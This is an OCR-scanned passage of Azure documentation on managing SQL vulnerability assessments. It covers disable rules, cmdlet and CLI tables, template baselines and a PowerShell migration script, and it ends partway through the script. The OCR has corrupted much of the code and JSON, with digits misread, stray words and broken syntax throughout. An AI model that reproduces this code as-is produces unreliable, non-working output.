unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it won't appear 
in the list of findings. Typical scenarios may include: 


e Disable findings with medium or lower severity 
e Disable findings that are non-patchable 


e Disable findings from benchmarks that aren't of interest for a defined scope 


@ Important 


e To disable specific findings, you need permissions to edit a policy in Azure 
Policy. Learn more in Azure RBAC permissions in Azure Policy. 

e Disabled findings will still be included in the weekly SQL vulnerability 
assessment email report. 


e Disabled rules are shown in the "Not applicable" section of the scan results. 


To create a rule: 


1. From the recommendations detail page for Vulnerability assessment findings on 
your SQL servers on machines should be remediated, select Disable rule. 


2. Select the relevant scope. 
3. Define your criteria. You can use any of the following criteria: 


e Finding ID 
e Severity 
e Benchmarks 


Dashboard > Microsoft Defender for Cloud Disable rule (Preview) 


Vulnerability assessment findings on your SQL ser "SIETE 
Disable Action 


(2) Exempt © Disable rule | G view policy definition Disable findings that match any of the following criteria: 


wv Description Parameters 
IDs © 
v Affected resources 
VA1258 ZA 
^ Security Checks Minimum severity © 
| . None Vv 
Findings Passed Disabled findings Benchmarks © 
| Benchmarks: All 
| D Search to filter items... 
ID Security Check Justification (optional) 
VA2108 Minimal set of principals should be members of fixed high impact dat 
VA2129 Changes to signed modules should be authorized 
VA1258 Database owners are as expected 
VA2114 Minimal set of principals should be members of fixed server roles 
VA2120 Features that may affect security should be disabled 
EO EEE h hould b d O New disable rules applied to a subscription might take up to 
VA2110 Execute permissions to access the registry should be restricte 30 minutes to take effect. New rules on a management group 
Egur E i d 3 
VA1220 Database communication using TDS should be protected through TLS GIE GOO ` 
Disabling rule on the MG will apply/override any rules that 
VA1279 Force encryption should be enabled for TDS may exist on underlying subscriptions 
VA1018 Latest updates should be installed Apply rule | Cancel 
VA1059 xp_cmdshell should be disabled 
Trigger logic app Exempt 


4. Select Apply rule. Changes might take up to 24 hrs to take effect. 
5. To view, override, or delete a rule: 
a. Select Disable rule. 


b. From the scope list, subscriptions with active rules show as Rule applied. 


Disable rule 


41 subscriptions 


You can define a rule to disable one or more findings for this recommendation. Disabled findings won't be counted towards your 
secure score 


Item Current status More 


? ASC DEM Rule applied H 


v JA GAI Orchestration Service Public Gan 4 of 5 subsc View rule 


Se (4) ETETE f 2 subscript Delete rule 


c. To view or delete the rule, select the ellipsis menu ("..."). 


Manage vulnerability assessments programmatically 


Azure PowerShell 


O Note 


This article uses the Azure Az PowerShell module, which is the recommended 


PowerShell module for interacting with Azure. To get started with the Az PowerShell 


module, see Install Azure PowerShell. To learn how to migrate to the Az PowerShell 


module, see Migrate Azure PowerShell from AzureRM to Az. 


© Important 


The PowerShell Azure Resource Manager module is still supported, but all future 


development is for the Az.Sql module. For these cmdlets, see AZureRM.Sql. The 


arguments for the commands in the Az module and in the AzureRm modules are 


substantially identical. 


You can use Azure PowerShell cmdlets to programmatically manage your vulnerability 


assessments. The supported cmdlets are: 


Cmdlet name as a link 


Clear-AzSqIDatabaseVulnerabilityAssessmentRuleBaseline 


Clear-AzSqlDatabaseVulnerabilityAssessmentSetting 


Clear- 
AzSqllnstanceDatabaseVulnerabilityAssessmentRuleBaseline 


Clear- 
AzSqllnstanceDatabaseVulnerabilityAssessmentSetting 


Clear-AzSqllnstanceVulnerabilityAssessmentSetting 


Convert-AzSq|DatabaseVulnerabilityAssessmentScan 


Description 


Clears the vulnerability assessment 
rule baseline. 

First, set the baseline before you 
use this cmdlet to clear it. 


Clears the vulnerability assessment 
settings of a database. 


Clears the vulnerability assessment 
rule baseline of a managed 
database. 

First, set the baseline before you 
use this cmdlet to clear it. 


Clears the vulnerability assessment 
settings of a managed database. 


Clears the vulnerability assessment 
settings of a managed instance. 


Converts vulnerability assessment 
scan results of a database to an 
Excel file (export). 


Cmdlet name as a link 
Convert- 


AzSq|lnstanceDatabaseVulnerabilityAssessmentScan 


Get-AzSqIDatabaseVulnerabilityAssessmentRuleBaseline 


Get- 
AzSqllnstanceDatabaseVulnerabilityAssessmentRuleBaseline 


Get-AzSq|IDatabaseVulnerabilityAssessmentScanRecord 


Get- 
AzSqllnstanceDatabaseVulnerabilityAssessmentScanRecord 


Get-AzSqIDatabaseVulnerabilityAssessmentSetting 


Get-AzSqllnstanceDatabaseVulnerabilityAssessmentSetting 


Set-AzSq|DatabaseVulnerabilityAssessmentRuleBaseline 


Set- 
AzSqllnstanceDatabaseVulnerabilityAssessmentRuleBaseline 


Start-AzSqIDatabaseVulnerabilityAssessmentScan 


Start-AzSqllnstanceDatabaseVulnerabilityAssessmentScan 


Update-AzSq|DatabaseVulnerabilityAssessmentSetting 


Update- 
AzSqllnstanceDatabaseVulnerabilityAssessmentSetting 


Description 


Converts vulnerability assessment 
scan results of a managed 
database to an Excel file (export). 


Gets the vulnerability assessment 
rule baseline of a database for a 
given rule. 


Gets the vulnerability assessment 
rule baseline of a managed 
database for a given rule. 


Gets all vulnerability assessment 
scan records associated with a 
given database. 


Gets all vulnerability assessment 
scan records associated with a 
given managed database. 


Returns the vulnerability 
assessment settings of a database. 


Returns the vulnerability 
assessment settings of a managed 
database. 


Sets the vulnerability assessment 
rule baseline. 


Sets the vulnerability assessment 
rule baseline for a managed 
database. 


Triggers the start of a vulnerability 
assessment scan on a database. 


Triggers the start of a vulnerability 
assessment scan on a managed 
database. 


Updates the vulnerability 
assessment settings of a database. 


Updates the vulnerability 
assessment settings of a managed 
database. 


Cmdlet name as a link Description 


Update-AzSqllnstanceVulnerabilityAssessmentSetting Updates the vulnerability 


assessment settings of a managed 
instance. 


For a script example, see Azure SQL vulnerability assessment PowerShell support. 


Azure CLI 


© Important 


The following Azure CLI commands are for SQL databases hosted on VMs or on- 
premises machines. For vulnerability assessments regarding Azure SQL Databases, 
refer to the Azure portal or PowerShell section. 


You can use Azure CLI commands to programmatically manage your vulnerability 
assessments. The supported commands are: 


Command name as a 
link 


az security va sql baseline 
delete 


az security va sql baseline 
list 


az security va sql baseline 
set 


az security va sql baseline 
show 


az security va sql baseline 
update 


az security va sql results 
list 


az security va sql results 
show 


az security va sql scans list 


az security va sql scans 
show 


Description 


Delete SQL vulnerability assessment rule baseline. 


View SQL vulnerability assessment baseline for all rules. 


Sets SQL vulnerability assessment baseline. Replaces the current 


baseline. 


View SQL vulnerability assessment rule baseline. 


Update SQL vulnerability assessment rule baseline. Replaces the 


current rule baseline. 


View all SQL vulnerability assessment scan results. 


View SQL vulnerability assessment scan results. 


List all SQL vulnerability assessment scan summaries. 


View SQL vulnerability assessment scan summaries. 


Resource Manager templates 


To configure vulnerability assessment baselines by using Azure Resource Manager 
templates, use the 


Microsoft .Sql/servers/databases/vulnerabilityAssessments/rules/baselines type. 
Ensure that you have enabled vulnerabilityAssessments before you add baselines. 


Here's an example for defining Baseline Rule VA2065 to master database and VA1143 to 


user database as resources in a Resource Manager template: 


JSON 


"resources": [ 


{ 
"type": "Microsoft.Sql/servers/databases/vulnerabilityAapiVersion": 
"2018-06-01", 
"name": "[concat(parameters('server_name'),'/', 


parameters('database_ name') , '/default/VA2@65/master')]", 
"properties": { 
"paselineResults": [ 
{ 
"result": [ 

"FirewallRuleName3", 
"StartIpAddress", 

“EndIpAddress" 


"result": [ 
"FirewallRuleName4", 
162.92.15.680, 
162.92 157085 


Jo 
"type": "Microsoft.Sql/servers/databases/vulnerabilityAapiVersion": 
"2018-06-01", 
"name": "[concat(parameters('server_name'),'/', 
parameters('database_name'), '/default/VA2130/Default')]", 
"dependsOn": [ 
"[Tresourceld( 'Microsoft.Sql/servers/vulnerabilityAssessments', 
parameters('server_name'), ‘Default')]" 
ils 
"properties": { 
"paselineResults": [ 
{ 
"result": [ 
"dbo" 


For master database and user database, the resource names are defined differently: 


e Master database - "name": "[concat(parameters(‘server_name’),'/’, 
parameters(‘database_name’), '/default/VA2065/master')]", 


e User database - "name": "[concat(parameters(‘server_name’),'/’, 
parameters(‘database_name’), '/default/VA2065/default')]", 


To handle Boolean types as true/false, set the baseline result with binary input like 
"1"/"0". 


JSON 
{ 
"type": "Microsoft.Sql/servers/databases/vulnerabilityapiVersion": 
"2018-06-01", 
"name": "[concat(parameters('server_name'),'/', 


parameters('database_name'), '/default/VA1143/Default')]", 


"dependsOn": [ 
"[resourceld('Microsoft.Sql/servers/vulnerabilityAssessments', 
parameters('server_name'), 'Default')]" 


E 


"properties": { 
"paselineResults": [ 


{ 
"result": [ 
Sise 
] 


Next steps 


e Learn more about Microsoft Defender for Azure SQL. 

e Learn more about data discovery and classification. 

e Learn more about storing vulnerability assessment scan results in a storage 
account accessible behind firewalls and VNets. 

e Check out common questions about Azure SQL databases. 


Enable vulnerability assessments on 
Azure SQL databases with the express 
configuration 


Article e 07/03/2023 


This PowerShell script enables the express configuration of vulnerability assessments on 
an Azure SQL Server. 


If vulnerability assessment has already been configured using the classic configuration, 
this script migrates it to the express configuration and copies all of the pre-existing 
baseline definitions. Your scan history isn't copied over to the new configuration. Your 
scan history remains accessible on the storage account that was previously used by the 


classic configuration. 


Prerequisites 


This sample requires Azure PowerShell Az 1.0 or later. Run Get-Module -ListAvailable 
Az to see which versions are installed. If you need to install, see Install Azure PowerShell 


module. 
Run Connect-AzAccount to sign in to Azure. 


If you don't have an Azure subscription, create an Azure free account” before you 
begin. 


e The user should have storage Blob Data Reader role on the storage account. 


e Storage networking settings must be configured to allow access to the machine 
that executes the command. 


e You must have permission to create folders in the working directory used by the 
script. 


Sample script - 
Migrating ToExpressConfiguration.ps1 


O Note 


We recommend that you use the Azure Az PowerShell module to interact with 
Azure. See Install Azure PowerShell to get started. To learn how to migrate to the 
Az PowerShell module, see Migrate Azure PowerShell from AzureRM to Az. 


PowerShell 


#Requires -Modules @{ ModuleName="Az.Sql"; ModuleVersion="3.11.0" } 
#Requires -Modules @{ ModuleName="Az.Storage"; ModuleVersion="4.8.0" } 
#Requires -Modules @{ ModuleName="Az.Accounts"; ModuleVersion="2.9.1" } 
#Requires -Version 5.1 


<# 
- SYNOPSIS 

This script configured an Azure SQL Server to the express configuration 
Vulnerability Assessment feature, scans all databases that belong to the 
selected server and set baselines (if defined in classic configuration) from 
the storage that is configures in the policy. 


. DESCRIPTION 
This script migrates Azure SQL Server to express configuration Vulnerability 
Assessment feature by executing the following steps: 
- It deletes the current Vulnerability Assessment settings (if exists). 

This step will reset all the Vulnerability Assessment scans and baselines 
for all databases. 
- It copies the current baselines (if exist) from the customer's storage. 


In order to revert this script follow the instructions as mentioned here: 
https://learn.microsoft.com/en-us/azure/defender -for-cloud/sql-azure- 
vulnerability-assessment-manage?tabs=express#revert-back-to-the-classic- 
configuration. 


.PARAMETER ServerSubscriptionId 
The Subscription id that the server belongs to 


.PARAMETER ServerResourceGroupName 
The Resource Group that the server belongs to 


.»PARAMETER ServerName 
The SQL server name that we want to apply the new SQL Vulnerability 
Assessment policy to. 


.PARAMETER Force 
Will remove the old Vulnerability Assessment setting without asking for 
confirmation. 


. EXAMPLE 

.\MigratingToExpressConfiguration.ps1 -SubscriptionId "25b642fc-0@5c3- 
11ed-b939-0242ac120002" -ResourceGroupName "“ResourceGroup@1i" -ServerName 
"Server@1" -Force 

.\MigratingToExpressConfiguration.ps1 -SubscriptionId "25b642fc-@5c3- 
11ed-b939-0242ac120002" -ResourceGroupName “ResourceGroup@1i" -ServerName 
"Server@1" 


#> 


param 
( 
[Parameter(Mandatory = $True) ] 
[string ]$SubscriptionId, 


[Parameter(Mandatory = $True) ] 
[string ]$ResourceGroupName, 


[Parameter(Mandatory = $True) ] 
[string ]$ServerName, 


[Parameter (Mandatory 
[switch]$Force 


$False) ] 


HHHHHH New SQL Vulnerability Assessment Commands ###### 
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function GetSqlVulnerabilityAssessmentServerSetting($SubscriptionId, 
$ResourceGroupName, $ServerName) { 

$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api- 
version=2022-02-01-preview" 

return SendRestRequest -Method "Get" -Uri $Uri 


function SetSqlVulnerabilityAssessmentServerSetting($SubscriptionId, 
$ResourceGroupName, $ServerName) { 

$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api- 
version=2022-02-01-preview" 

$Body = @{ 

properties = @{ 
state = "Enabled" 


¢Body = $Body | ConvertTo-Json 
return SendRestRequest -Method "Put" -Uri $Uri -Body $Body 


function 
SetSqlVulnerabilityAssessmentBaselineOnUserDatabase($SubscriptionId, 
$ResourceGroupName, $ServerName, $DatabaseName, $Baseline) { 

$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/baselines/default?api-version=2022-02-01-preview" 

¢convertedBaseline = $Baseline | ConvertFrom-Json 


$properties = @{ 
properties = @{ 
latestScan 

results 


$false 
@{} 


if ($convertedBaseline.RuleBaselines.Count -eq @) { 
# baseline is null/empty. No need to send the API call. 
return 


foreach ($rule in $convertedBaseline.RuleBaselines) { 
$ruleId = $rule.RuleId 
$expectedResults = $rule.Properties.ExpectedResults 


if ($ruleId -in $VABinaryRules) { 
if ($expectedResults[@][@] -eq "1") { 
$expectedResults[@][@] = "True" 


} 
else { 

$expectedResults[@][@] = "False" 
} 


$properties.properties.results[$ruleId] = $expectedResults 


¢Body = $properties | ConvertTo-Json -Depth 5 
return SendRestRequest -Method "Put" -Uri $Uri -Body $Body 


function 
SetSqlVulnerabilityAssessmentBaselineOnSystemDatabase($SubscriptionId, 
$ResourceGroupName, $ServerName, $DatabaseName, $Baseline) { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baseli 
nes/default?api-version=2022-02-01-preview&systemDatabaseName=master" 
¢convertedBaseline = $Baseline | ConvertFrom-Json 
$properties = @{ 
properties = @{ 
latestScan = $false 
results @{} 


if ($convertedBaseline.RuleBaselines.Count -eq 0) { 
# baseline is null/empty. No need to send the API call. 
return 


foreach ($rule in $convertedBaseline.RuleBaselines) { 
$ruleId = $rule.RulelId 


$expectedResults = $rule.Properties.ExpectedResults 


if ($ruleId -in $VABinaryRules) { 
if ($expectedResults[@][@] -eq "1") { 


$expectedResults[@][@] = "True" 
} 
else { 

g$expectedResults[@][@] = "False" 
} 


$properties.properties.results[$ruleId] = $expectedResults 


¢Body = $properties | ConvertTo-Json -Depth 5 
return SendRestRequest -Method "Put" -Uri $Uri -Body $Body 


function RunSqlVulnerabilityAssessmentScanOnUserDatabase($SubscriptionId, 
$ResourceGroupName, $ServerName, $DatabaseName) { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/initiateScan?api-version=2022-02-01-preview" 
SendRestRequest -Method "Post" -Uri $Uri 


function RunSqlVulnerabilityAssessmentScanOnSystemDatabase($SubscriptionId, 
$ResourceGroupName, $ServerName, $DatabaseName) { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/initia 
teScan?api-version=2022-02-01-preview&systemDatabaseName=$DatabaseName" 
SendRestRequest -Method "Post" -Uri $Uri 


function GetSqlVulnerabilityAssessmentScanOnUserDatabase($SubscriptionId, 
$ResourceGroupName, $ServerName, $DatabaseName) { 

$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/scans/latest?api-version=2022-02-01-preview" 

return SendRestRequest -Method "Get" -Uri $Uri 


function GetSqlVulnerabilityAssessmentScanOnSystemDatabase($SubscriptionId, 
$ResourceGroupName, $ServerName, $DatabaseName) { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/scans/ 
latest ?api-version=2022-02-01-preview&systemDatabaseName=$DatabaseName" 
return SendRestRequest -Method "Get" -Uri $Uri 


function SendRestRequest( 
[Parameter(Mandatory = $True) ] 
[string] $Method, 
[Parameter(Mandatory = $True) ] 
[string] $Uri, 
[parameter( Mandatory = $false )] 
[string] $Body = "DEFAULT") { 


$Params = @{ 
Method = $Method 
Path = $Uri 
} 
if (!($Body -eq "DEFAULT")) { 
$Params = @{ 
Method = $Method 
Path = $Uri 
Payload = $Body 
} 


Invoke-AzRestMethod @Params 
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function LogMessage { 
[CmdletBinding() ] 
Param 


( 


[Parameter(Mandatory=$true, Position=@) ] 
[string ]$LogMessage 


Write-Host ("{@} - {1}" -f (Get-Date), $LogMessage) 


function LogError { 
[CmdletBinding() ] 
Param 


( 


[Parameter (Mandatory=$true, Position=@) ] 
[string ]$LogMessage 


Write-Error ("{@} - {1}" -f (Get-Date), $LogMessage) 
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function Retry() { 
param( 
[Parameter(Mandatory = $true)][Action]$action, 
[Parameter(Mandatory = $false) ][int]$maxAttempts 


3 


$attempts = 1 


do { 
try { 
$result = $action. Invoke(); 
return $result 
} 


catch [Exception] { 
LogMessage -LogMessage $_.Exception.Message 


# exponential backoff delay 
$attempts++ 
if ($attempts -le $maxAttempts) { 
$retryDelaySeconds = [math]::Pow(2, $attempts) 
$retryDelaySeconds = $retryDelaySeconds - 1 # Exponential 
Backoff Max == (24n)-1 
LogMessage -LogMessage ("Action failed. Waiting " + 
$retryDelaySeconds + " seconds before attempt " + gattempts + " of " + 
$maxAttempts + ".") 
Start-Sleep $retryDelaySeconds 


} 

else { 
LogError $_.Exception.Message 
$ex = New-Object System.Exception($_.Exception.Message) 
throw $ex 

} 


} while ($attempts -le $maxAttempts) 


function HaveVulnerabilityAssessmentSetting($ResourceGroupName, $ServerName, 
$Databases) { 

# Check if we have a server setting. 

LogMessage -LogMessage "Check Vulnerability Assessment setting for 
'$($ServerName)' server" 

$vaServerSetting = Get-AzSqlServerVulnerabilityAssessmentSetting - 
ResourceGroupName $ResourceGroupName -ServerName $ServerName 

if (![string]::IsNullOrEmpty($vaServerSetting.StorageAccountName)) { 

return $true 


# Check if we have a database setting for server 
foreach ($database in $Databases) { 
LogMessage -LogMessage "Check VA settings for 
'$($database.DatabaseName)' database" 
$vaDatabaseSetting = Get-AzSqlDatabaseVulnerabilityAssessmentSetting 
-ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName 
$database.DatabaseName 
if (![string]::IsNullOrEmpty($vaDatabaseSetting.StorageAccountName) ) 


return $true 


return ¢$false 


function 
HaveExpressConfigurationVulnerabilityAssessmentSetting($SubscriptionId, 
$ResourceGroupName, $ServerName) { 

# Check if we have a server setting. 

LogMessage -LogMessage "Check express configuration Vulnerability 
Assessment setting for '$($ServerName)' server" 

$Response = GetSqlVulnerabilityAssessmentServerSetting -SubscriptionId 
$SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName 
$ServerName 

if ($Response.Content.Contains("Enabled")) { 

return $true 


return $false 


function GetBlobsFromStorage($ContainerName, $Context) { 


# Use Get-AzStorageBlob to retrieve a list of blobs from the container 
$blobs = Get-AzStorageBlob -Container $ContainerName -Context $Context 


if ([string]::IsNullOrEmpty($blobs)) { 
return 


return $blobs 


function ExtractBaselineBlobName($ServerName, $DatabaseName) { 
$prefix = "“scans/$ServerName/$DatabaseName/baseline" 


# Filter the list to include only blobs with names starting with 
"baseline" 
$baselineBlobs = $blobs | Where-Object { $_.Name.StartsWith($prefix) } 


if ($baselineBlobs.Count -eq @) { 
return 
} 
else { 
# Sort the list by LastModified descending and get the first item 
¢mostRecentBlob = $baselineBlobs | Sort-Object LastModified - 
Descending | Select-Object -First 1 


# Get the name of the most recent blob 
gmostRecentBlobName = $mostRecentBlob.Name 


LogMessage -LogMessage "The most recent blob with the ‘baseline’ 
prefix is: $mostRecentBlobName" 


return $mostRecentBlobName 


function ReadDatabaseBaselineFromStorage($ServerName, $BlobName, 
$ContainerName, ¢$Context) { 

# Use Get-AzStorageBlobContent to retrieve the blob content as a string 

$blobContent = Get-AzStorageBlobContent -Blob $BlobName -Container 
$ContainerName -Context $Context 

$blobContent = $blobContent.ICloudBlob.DownloadText() 


if ([string]::IsNullOrEmpty($blobContent)) { 
return 


return $blobContent 


function GetBaselineConfigurationForDatabase($ServerName, $DatabaseName, 
$VaDatabasePolicyStorage, $VaDatabasePolicyContainer) { 


# Get storage account context 
$ctx = New-AzStorageContext -StorageAccountName $VaDatabasePolicyStorage 


# Extract baseline blob name 
$blobs = GetBlobsFromStorage -ContainerName $VaDatabasePolicyContainer - 
Context $ctx 
if ([string]::IsNullOrEmpty($blobs)) { 
$ex = New-Object System.Exception("Failed to get blobs from the 
storage. Verify that you have Storage Blob Data Reader role assignment on 
the storage.") 
throw $ex 


# Extract baseline blob name 
$blobName = ExtractBaselineBlobName -ServerName $ServerName - 
DatabaseName $DatabaseName 
if ([string]::IsNullOrEmpty($blobName)) { 
LogMessage -LogMessage "No baseline blob was found for $DatabaseName 
database." 
return 


# Extract the baseline 
$baseline = ReadDatabaseBaselineFromStorage -ServerName $ServerName - 
BlobName $blobName -ContainerName $VaDatabasePolicyContainer -Context $ctx 
if ([string]::IsNullOrEmpty($baseline)) { 
$ex = New-Object System.Exception("Failed to get blobs from the 
storage. Verify that you have Storage Blob Data Reader role assignment on 
the storage.") 
throw $ex 


LogMessage -LogMessage "Found baseline for $($DatabaseName) database." 
return $baseline 


function ClearBaselineFolder() { 
# Clean baseline folder 
$scriptPath = Get-Location 
$folderPath = Join-Path -Path $scriptPath.Path -ChildPath "scans" 


if (Test-Path ¢$folderPath) { 
# Remove folder from previous runs 
Remove-Item $folderPath -Recurse 


BANANA 


$VABinaryRules = @("VA1018", "VA1@22", "VA1023", "VA1024", "VA1043", 
"VA1044", "VA1045", "VA1@51", "VA1@52", "VA1@53", "VA1058", "VA1@59", 
"VA1067", "VA1071", "VA1@72", "VA1@91", "VA1@92", "VA1093", "VA1102", 
ARPE ENET ERE "WAI230". "WAdo35". “VAI245". “VAI26a". "VA1265", 
AREETA EEREN E "VAID83",. "VA20G0". “VA2G1". “VA2I24" “VAzID2" 
"VA2128") 
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# Connect 
$subscription = Connect-AzAccount -Subscription $SubscriptionId 
if ([string]::IsNullOrEmpty($subscription) ) 
{ 
LogError “Failed to get the subscription. Migration cancelled. Fix 
errors and try again later." 
return 


$srv = Get-AzSqlServer -ResourceGroupName $ResourceGroupName -ServerName 
$ServerName 
if ([string]::IsNullOrEmpty($¢srv) ) 
{ 

LogError "The server was not found. Migration cancelled. Fix errors and 
try again later." 


return 
} 
ClearBaselineFolder 
$baselines = @{} 


$databases = Get-AzSqlDatabase -ResourceGroupName $ResourceGroupName - 
ServerName $ServerName | Where-Object { $_.DatabaseName -ne "master" } 
$haveVaSetting = HaveVulnerabilityAssessmentSetting -ResourceGroupName 
$ResourceGroupName -ServerName $ServerName -Databases $databases 
$haveExpressConfigurationVA = 
HaveExpressConfigurationVulnerabilityAssessmentSetting -SubscriptionId 
$SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName 
$ServerName 


if ($haveExpressConfigurationvA) { 


LogMessage -LogMessage "Express configuration vulnerability assessment 
setting is already exist on this server. Cancelling script." 
return 


if ($haveVaSetting) { 
# Get server policy container path 
$vaServerSetting = Get-AzSqlServerVulnerabilityAssessmentSetting - 
ResourceGroupName $ResourceGroupName -ServerName $ServerName 
$vaServerPolicyStorage = $vaServerSetting.StorageAccountName 
$vaServerPolicyContainer = $vaServerSetting.ScanResultsContainerName 


$canRemoveVa = $true 


# Go over each database and get the baseline (is exist). 


$i = @ 
foreach ($database in $Databases) { 
$i += 1 


$completed = ($i/$Databases.count) * 100 

Write-Progress -Activity "Processing" -Status "Progress:" - 
PercentComplete $completed 

LogMessage -LogMessage "Starting to fetch baseline for 
$($database.DatabaseName) database." 

$vaDatabaseSetting = Get-AzSqlDatabaseVulnerabilityAssessmentSetting 
-ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName 
$database.DatabaseName 

$adsDatabasePolicy = Get- 
AzSqlDatabaseAdvancedThreatProtectionSetting -ResourceGroupName 
$ResourceGroupName -ServerName $ServerName -DatabaseName 
$database.DatabaseName 

$adsDatabasePolicyEnabled = (! 
[string]::IsNullOrEmpty($adsDatabasePolicy.ThreatDetectionState) -and 
$adsDatabasePolicy.ThreatDetectionState -eq “Enabled") -or (! 
[string]::IsNullOrEmpty($adsDatabasePolicy.AdvancedThreatProtectionState) - 
and $adsDatabasePolicy.AdvancedThreatProtectionState -eq "Enabled") # Handle 
breaking changes in the command. 

$containsDatabasePolicy = $adsDatabasePolicyEnabled -and ! 
[string]::IsNullOrEmpty($vaDatabaseSetting.StorageAccountName ) 


if ($containsDatabasePolicy) { 
# The database has database policy. Using the database policy 
storage. 
$vaDatabasePolicyStorage = $vaDatabaseSetting.StorageAccountName 
$vaDatabasePolicyContainer = 
$vaDatabaseSetting.ScanResultsContainerName 


} 
else { 
$vaDatabasePolicyStorage = $vaServerPolicyStorage 
$vaDatabasePolicyContainer = $vaServerPolicyContainer 
} 
IEE A 


$baseline = GetBaselineConfigurationForDatabase -ServerName 
$ServerName -DatabaseName $database.DatabaseName -VaDatabasePolicyStorage 
$vaDatabasePolicyStorage -VaDatabasePolicyContainer 


$vaDatabasePolicyContainer 
$baselines[$database.DatabaseName] = $baseline 
LogMessage -LogMessage "Finished to fetch baseline for 
$($database.DatabaseName) database." 
} 
catch { 
LogError "An error occurred: $($_.Exception.Message) while 
handling $($database.DatabaseName) database." 
$canRemoveVa = $false 


# Get the baseline of master database (is exist). 
try { 
LogMessage -LogMessage "Starting to fetch baseline for master 
database." 
$baseline = GetBaselineConfigurationForDatabase -ServerName 
$ServerName -DatabaseName "master" -VaDatabasePolicyStorage 
$vaServerPolicyStorage -VaDatabasePolicyContainer $vaServerPolicyContainer 
$baselines["master"] = $baseline 
LogMessage -LogMessage "Finished to fetch baseline for database 
master." 
} 
catch { 
LogError "An error occurred: $($_.Exception.Message) while handling 
master database." 
$canRemoveVa = $false 


ClearBaselineFolder 


if ($canRemovevVa) { 
if (!$Force) { 
LogMessage -LogMessage “We are going to remove the current 
Vulnerability Assessment settings for this server and underlying databases." 
$Confirmation = Read-Host -Prompt "Do you approve (y/n)?" 
if ($Confirmation -ne "y") { 
LogMessage -LogMessage "You chose to stop the migration 
process. Existing VA settings will not be changed." 


return 
} 
} 
# Clear all server and databases policies 
$i =ð 
foreach ($database in $Databases) { 
$i += 1 


$completed = ($i/$Databases.count) * 100 

Write-Progress -Activity "Processing" -Status "Progress:" - 
PercentComplete $completed 

LogMessage -LogMessage "Clear Vulnerability Assessment setting 
for '$($database.DatabaseName)' database." 

Clear-AzSqlDatabaseVulnerabilityAssessmentSetting - 
ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName 


$database.DatabaseName 


} 


# Removing old server Vulnerability Assessment setting 

LogMessage -LogMessage "Clear Vulnerability Assessment setting for 
'$($ServerName)' server." 

Clear-AzSqlServerVulnerabilityAssessmentSetting -ResourceGroupName 
$ResourceGroupName -ServerName $ServerName 


} 

else { 
LogError "Migration cancelled. Fix errors and try again later." 
return 

} 


# Set new SQL Vulnerability Assessment Setting 

LogMessage -LogMessage "Add express configuration Vulnerability Assessment 
feature setting for '$($ServerName)' server." 

$Response = SetSqlVulnerabilityAssessmentServerSetting -SubscriptionId 
$SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName 
$ServerName 

$successStatusCodes = @(200, 201, 202) 

if ($Response.StatusCode -in $successStatusCodes) { 

LogMessage -LogMessage "Congratulations, your server '$($ServerName) ' 
server is set up with express configuration Vulnerability Assessment 
feature" 

} 
else { 

LogMessage -LogMessage “There was a problem to enable express 
configuration Vulnerability Assessment feature on the '$($ServerName) ' 
server. Error '$($Response.StatusCode)': '$($Response.Content)'" 

return 


# Run a new scan on all the databases 
$i = @ 
foreach ($database in $Databases) { 

$i += 1 

$completed = ($i/$Databases.count) * 100 

Write-Progress -Activity "Processing" -Status "Progress:" - 
PercentComplete $completed 

LogMessage -LogMessage "Run scan on '$($database.DatabaseName) ' 
database." 

Retry -action { RunSqlVulnerabilityAssessmentScanOnUserDatabase - 
SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName - 
ServerName $ServerName -DatabaseName $database.DatabaseName } 


} 


LogMessage -LogMessage "Run scan on 'master' database." 

Retry -action { RunSqlVulnerabilityAssessmentScanOnSystemDatabase - 
SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName - 
ServerName $ServerName -DatabaseName "master" } 


LogMessage -LogMessage "Wait for scan results..." 
Start-Sleep 60 


# Wait for scan results 


$i = @ 
foreach ($database in $Databases) { 
$i += 1 


$completed = ($i/$Databases.count) * 100 

Write-Progress -Activity "Processing" -Status "Progress:" - 
PercentComplete $completed 

try d 

LogMessage -LogMessage "Waiting for results for 
$($database.DatabaseName) database." 

Retry -action { GetSqlVulnerabilityAssessmentScanOnUserDatabase - 
SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName - 
ServerName $ServerName -DatabaseName $database.DatabaseName } 

LogMessage -LogMessage "Received results for 
$($database.DatabaseName) database." 

} 
catch { 

LogMessage -LogMessage "Failed to get latest scan results for 
$($database.DatabaseName). Stopping the migration." 

LogMessage -LogMessage "You can revert back to classic 
configuration. For more information: https://learn.microsoft.com/en- 
us/azure/defender-for-cloud/sql-azure-vulnerability-assessment-manage? 
tabs=express#revert -back-to-the-classic-configuration" 

return 


try { 
LogMessage -LogMessage "Waiting for results for master database" 


